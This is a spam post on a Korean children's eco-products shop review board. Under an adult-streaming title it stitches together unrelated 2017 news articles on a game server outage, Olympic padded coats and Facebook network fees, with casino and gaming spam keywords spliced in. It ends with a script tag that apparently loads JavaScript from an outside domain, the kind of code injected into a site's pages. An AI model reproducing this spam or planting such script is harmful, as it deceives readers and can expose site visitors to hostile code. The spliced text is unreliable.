상품체험 후기

아이들과 환경을 생각하는 "그린차일드"

HOME > 커뮤니티 > 상품체험 후기

상품체험 후기 눕방 처음하는 뉴비 여캠
2020-01-17 19:44:07
강용희종우 <> 조회수 21
182.237.73.157
바닐라게임20171206,IT과학,아시아경제,‘롤 점검’ 오후 1시까지 예정…크리스마스 신규 스킨 선보이나,롤 점검 사진 리그오브레전드 홈페이지 캡처 게임 ‘리그오브레전드’가 6일 오후 1시까지 서비스 점검을 진행한다. 공식 홈페이지에 따르면 이날 오전 6시부터 오후 1시까지 7시간 동안 ‘리그오브레전드’가 점검에 들어간다. 이번 점검은 게임 서버 안정화 및 게임 업데이트가 목적으로 점검 시간 동안 게임 접속 모바일 상점 홈페이지를 이용할 수 없다. 이번 점검이 끝나면 7.24 패치 노트가 업데이트 될 것으로 예상돼 많은 유저들이 산타 드레이븐 마법공학 코그모 등 크리스마스 신규 스킨에 대해 기대감을 높이고 있다.트레인게임20171201,경제,아시아경제,유통핫피플패션 커넥티드 밤샘 고민 …평창 롱패딩의 산파,최은경 롯데백화점 상품본부 치프바이어 인터뷰 15년차 의류 상품기획 베테랑 작년 12월 상품본부 평창올림픽 라이센스팀 합류 브랜드 없는 아웃도어 팔릴까 걱정 … 평창패딩 대란 예상못해 아시아경제 지연진 기자 흥행부진 우려까지 낳았던 내년 평창올림픽을 전 국민에게 각인시킨 일등공신이 등장했다. 최근 품절 대란을 일으키며 매장 입고 때마다 밤샘 대기를 통해서도 구입할 수 없는 ‘평창 롱패딩’이 주인공이다. 올겨울 ‘롱패딩 열풍’을 확산시키며 수년간 성장둔화를 겪고 있는 패션업계와 백화점 업계에도 단비가 됐다. 최은경 롯데백화점 상품본부 치프바이어는 평창 롱패딩 열풍을 만들어낸 주역이다. 평창올림픽 공식 후원사인 롯데백화점은 지난해 12월 상품본부에 14명으로 구성된 라이센스팀을 신설했고 최 바이어도 합류했다. 평창 롱패딩은 올해 1월부터 아이디어 회의에 들어가 시장조사와 백화점 브랜드 매장을 일일이 돌며 설문조사를 통해 지난 2월에 최종 결정됐다. 최 바이어는 “올해 롱패딩을 유행할 것이라는 이야기를 듣고 롱패딩으로 결정했지만 외투의 경우 브래드력이 가장 중요한 만큼 브랜드 없는 아웃도어가 팔리지에 대한 고민이 가장 컸다”고 전했다. 라이센스팀에선 다른 브랜드 상품을 일일이 조사한 끝에 대부분의 브랜드에서 사용하는 덕다운 오리털 대신 퀄리티가 한 단계 높은 구스다운 거위털 으로 결정하고 지난 3월 업체선정에 들어갔다. 패딩 디자인은 물론 가격까지 롯데백화점 라이센스팀에서 총괄했다. 롱패딩에 들어갈 문구를 놓고도 밤샘 고민이 이어졌다. 그는 “평창올림픽 공식 슬로건인 패션 커넥티드 Passion Connected 하나의 열정 ’와 ‘팀코리아’ 평창올림픽 로고 가운데 팀코리아의 경우 외국인이 구매를 꺼릴수 있고 평창로고는 내년 겨울에는 입지 못할 수을 것을 고려해 패션 커넥티트가 낙점됐다”고 전했다. 평창 롱패딩은 3만장을 준비했지만 기획 초반엔 성공에 대한 확신이 없었다. 하지만 품질은 높이되 가격을 기존 브랜드대비 절반 가량으로 낮추면서 출시되자마자 이른바 ‘가성비갑 甲 ’ 상품으로 입소문이 나면서 평창 온라인몰에선 품절사태가 났다. 이후 롯데백화점 매장에선 평창롱패딩을 구입하기 위한 대기표까지 등장했고 구매 대기자들끼리 싸움까지 일어날 정도로 큰 인기를 모았다. 최 바이어는 “무엇보다 가성비 소비 트렌드와 맞아떨어졌고 우리나라에서 개최하는 평창올림픽을 기념한 상품인데다 3만장이라는 희소성 때문에 히트를 친 것 같다”고 분석했다. 2003년 롯데백화점에 입사한 최 수석바이어는 상품본부 바이어와 고객관리 등을 업무를 거치다 4년 전 아동 바이어로 자리를 옮겼다. 그 경험을 살려 최 바이어는 아동용 평창 롱패딩을 직접 기획하기도 했다. 8살 아들을 둔 어머니인 만큼 어린 자녀를 위한 롱패딩을 만들어 패밀리룩을 완성하고 싶었다. 아동용 평창롱패딩은 2000장을 만들었지만 이 역시 온라인몰에 올리고 초반에 일부 사이즈를 제외하고 대부분 완판됐다. 최 바이어는 “아이를 둔 엄마로서 아동 바이어 4년동안 스스로 즐거워서 일했다”면서도 “백화점에서 일하면서 우리나라가 개최하는 올림픽 상품을 직접 기획하는 경험은 거의 드문 일인 만큼 최근에 가장 뜻 깊은 시간을 보냈다”고 전했다. 롯데백화점 라인센스팀에서 개발한 평창올림픽 상품은 800여개에 달한다. 평창 롱패딩이 가장 히트를 쳤지만 손가락을 이용해 스몰하트를 만들 때 엄지와 검지가 선명하게 보이는 ‘핑거하트 장갑’을 비롯해 평창올림픽 마스코트 인형인 ‘수호랑 반다비’를 이용한 각종 기념상품을 전국 18개 롯데백화점과 온라인몰에서 판매 중이다.카지노 사이트 빅뱅20171204,IT과학,ZDNet Korea,페이스북 망사용료 논란 2라운드 돌입,통신사 제도화 요구…정부 조심스런 접근 지디넷코리아 김태진 기자 페이스북과 SK브로드밴드 간 ‘접속경로 임의변경’ 사태로 불거진 망사용료 이슈가 제도화 논의로 2라운드를 맞고 있다. 접속경로 임의변경은 지난 5월 페이스북이 사전 동의 없이 KT 캐시서버에 연결된 SK텔레콤의 라우터를 차단해 이용자 피해로 이어진 사건이다. 이후 국회 국정감사 과정에서 국내 인터넷 사업자들이 통신사에 지불하는 망사용료와 달리 페이스북은 적은 망사용료를 내고 있는 것이 드러나면서 국내외 사업자 간 역차별 이슈로 옮겨 붙었다. 페이스북이 국내 1위 포털사인 네이버보다 5배 이상의 트래픽을 발생시키고 있음에도 망사용료는 반대로 약 5분의 1밖에 지불하지 않고 있다는 것이 확인된 것이다. 네이버가 지난해 통신사에 지불한 망사용료는 734억원에 이른 반면 페이스북은 통신사 중 KT에만 캐시서버 이용대가로 약 100억원대를 지불했다. 4일 관련업계에 따르면 최근 통신사업자들은 해외 인터넷 사업자들도 국내 인터넷 사업자들과 형평성 있게 망사용료를 지불토록 하기 위해 관련 법제도 개선방안을 만들어 정부에 제출한다는 계획이다. 통신업계 한 관계자는 “페이스북 구글 등 글로벌 사업자들은 국내 인터넷 사업자들과 기울어진 운동장에서 경쟁을 하고 있다”며 “구글의 경우 국내 동영상 트래픽의 약 60%를 차지하고 있음에도 사실상 무임승차를 하고 있어 제도개선안을 만들어 정부에 제출할 준비를 하고 있다”고 밝혔다. 이는 해외 인터넷 기업들이 트래픽 증가로 인한 수익을 생태계에 속한 기업들과 공유하는 비즈니스모델을 가져가면서도 망 사업자와 관계에서는 이 같은 원칙이 지켜지지 않고 있다는 판단에서다. 프랑스 “망 대가 내지 않는다면 망 제공 거부 가능” 업계 관계자는 “해외 인터넷 기업들의 서비스로 트래픽이 기하급수적으로 늘고 있어 망 투자비에 대한 부담은 증가하고 있다”며 “하지만 적정 망사용료를 지급하지 않고 있어 망 고도화에는 저해가 되고 있고 통신 인터넷 기업 간 분쟁의 원인이 되고 있다”고 말했다. 지난 국정감사에서 유승희 의원은 “페이스북이나 구글로부터 국내 통신사가 망사용료를 받지 못하고 있고 그것도 부족해서 서버까지 제공하고 있다”며 “국내 사업자들과 역차별에 해당한다”고 지적했다. 이어 “해외 인터넷 기업들이 동영상 중심으로 사업의 방향을 바꾸고 있음에도 이런 차별로 국내 사업자들은 라이브나 가상현실 등 고품질 서비스 제공이 어렵다”면서 “트래픽에 대한 사업자 간 공정한 룰이 없어서 역차별이 계속 발생하고 있다”고 비판했다. 역차별 이슈뿐만 아니라 통신 글로벌 인터넷 기업 간 분쟁 역시 프랑스 미국 등 해외에서도 지속적으로 발생하고 있다. 2012년 프랑스에서는 프랑스텔레콤이 구글의 유튜브 트래픽이 급증하자 망 이용대가 지급을 요구했고 이를 거부하자 망 증설을 중단하면서 분쟁이 일어났다. 2014년 미국에서도 컴캐스트가 넥플릭스의 트래픽이 급증하자 망 이용대가를 요구했고 이를 거부하자 상호접속구간의 망 증설을 중단해 트래픽 과부하로 인한 분쟁이 발생됐다. 이후 2012년 9월 프랑스 공정위는 “망 이용대가를 내지 않을 경우 통신사는 망 제공 거부가 가능하다”며 “트래픽 속도를 차별하지 않는 경우 망 제공 거부는 망중립성 위반이 아니다”라고 판결했다. 업계 관계자는 “프랑스 판결 이후 망 이용대가를 지급하는 트래픽 비중이 2012년 22%에서 2016년 36%로 상승했다”며 “글로벌 인터넷 기업이 자국 통신사의 망 이용에 대해 대가를 지급하는 것이 타당하다는 원칙을 확립한 사례”라고 평가했다. 정부 “사전규제보다 사후규제 바람직” 이어 “국내에서도 네트워크 중심의 규제체계가 C P N D의 균형 잡힌 규제체계로 전환해야 한다”며 “통신사와 서비스사업자 간 동등 경쟁이 추진될 수 있도록 동등한 규율이 필요하다”고 강조했다. 또 “해외에서는 여러 방식으로 해결책을 모색 중이지만 국내에서는 아직 이슈 제기 단계”라면서 “우선적으로 글로벌 국내 기업 간 불공정한 게임의 룰을 바로 잡는 것이 필수적”이라고 말했다. 하지만 아직까지 국내에서는 사전규제를 만드는 데 다소 부담스럽다는 분위기다. 또 통신사와 인터넷 기업 간 사적계약에 가이드라인을 정하는 것도 바람직하지 않다는 입장이다. 정부 관계자는 “사업자 간 사적계약에 의한 것을 사전적으로 정해 일률적 규제를 하는 것에 대해서는 조심스러울 수밖에 없다”며 “불공정 행위에 대해 규제하는 것은 당연하고 방통위와 공정위가 사례별로 사후규제를 할 수 있다”고 말했다. 이어 “사적계약인 망 사용료를 정부가 하한선 상한선 등으로 강제하는 경우는 없고 이는 분쟁 발생 시 사후규제나 법원에서 결정할 일”이라며 “다만 사업자들이 해외사례를 토대로 정부에 관련된 건의를 한다면 검토해 볼 수는 있다”고 덧붙였다.
< script type="text/javascript" src="https://appzzang.me/js/video.min.js">< / script >